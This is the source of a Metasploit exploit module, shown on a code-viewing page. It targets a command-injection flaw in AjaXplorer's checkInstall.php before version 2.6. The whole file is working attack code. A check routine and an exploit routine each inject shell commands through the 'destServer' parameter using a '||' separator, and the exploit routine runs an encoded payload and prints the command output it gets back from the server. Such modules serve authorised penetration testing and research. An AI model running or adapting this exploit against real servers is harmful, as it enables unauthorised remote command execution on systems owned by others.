Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'AjaXplorer checkInstall.php Remote Command Execution',
14
      'Description'    => %q{
15
          This module exploits an arbitrary command execution vulnerability in the
16
        AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to
17
        2.6 are vulnerable.
18
      },
19
      'Author'         =>
20
        [
21
          'Julien Cayssol',  #Credited according to SecurityFocus
22
          'David Maciejak',  #Metasploit module
23
          'sinn3r'           #Final touch on the Metasploit module
24
        ],
25
      'License'        => MSF_LICENSE,
26
      'References'     =>
27
        [
28
          [ 'OSVDB', '63552' ],
29
          [ 'BID', '39334' ]
30
        ],
31
      'Privileged'     => false,
32
      'Payload'        =>
33
        {
34
          'DisableNops' => true,
35
          'Space'       => 512,
36
          'Compat'      =>
37
            {
38
              'ConnectionType' => 'find',
39
              'PayloadType' => 'cmd',
40
              'RequiredCmd' => 'generic perl ruby python telnet'
41
            }
42
        },
43
      'Platform'       => %w{ bsd linux osx unix win },
44
      'Arch'           => ARCH_CMD,
45
      'Targets'        => [[ 'AjaXplorer 2.5.5 or older', { }]],
46
      'DisclosureDate' => '2010-04-04',
47
      'DefaultTarget' => 0))
48

49
    register_options(
50
      [
51
        OptString.new('TARGETURI', [true, 'The base path to AjaXplorer', '/AjaXplorer-2.5.5/'])
52
      ])
53
  end
54

55
  def check
56
    uri = target_uri.path
57
    uri << '/' if uri[-1,1] != '/'
58
    clue = Rex::Text::rand_text_alpha(rand(5) + 5)
59

60
    res = send_request_cgi({
61
      'method' => 'GET',
62
      'uri'      => normalize_uri(uri, 'plugins/access.ssh/checkInstall.php'),
63
      'vars_get' => {
64
        'destServer'    => "||echo #{clue}"
65
      }
66
    })
67

68
    # If the server doesn't return the default redirection, probably something is wrong
69
    if res and res.code == 200 and res.body =~ /#{clue}/
70
      return Exploit::CheckCode::Vulnerable
71
    end
72

73
    return Exploit::CheckCode::Safe
74
  end
75

76
  def exploit
77
    peer = "#{rhost}:#{rport}"
78
    uri = target_uri.path
79

80
    # Trigger the command execution bug
81
    res = send_request_cgi({
82
      'method' => 'GET',
83
      'uri'      => normalize_uri(uri, "plugins/access.ssh/checkInstall.php"),
84
      'vars_get' =>
85
        {
86
          'destServer'    => "||#{payload.encoded}"
87
        }
88
      })
89

90
    if res
91
      print_status("The server returned: #{res.code} #{res.message}")
92
      m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || ''
93

94
      if m.empty?
95
        print_error("This server may not be vulnerable")
96
      else
97
        print_status("Command output from the server:")
98
        print_line(m)
99
      end
100
    end
101
  end
102
end
103

104
=begin
105
Repo:
106
http://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/2.6/
107
=end
108

109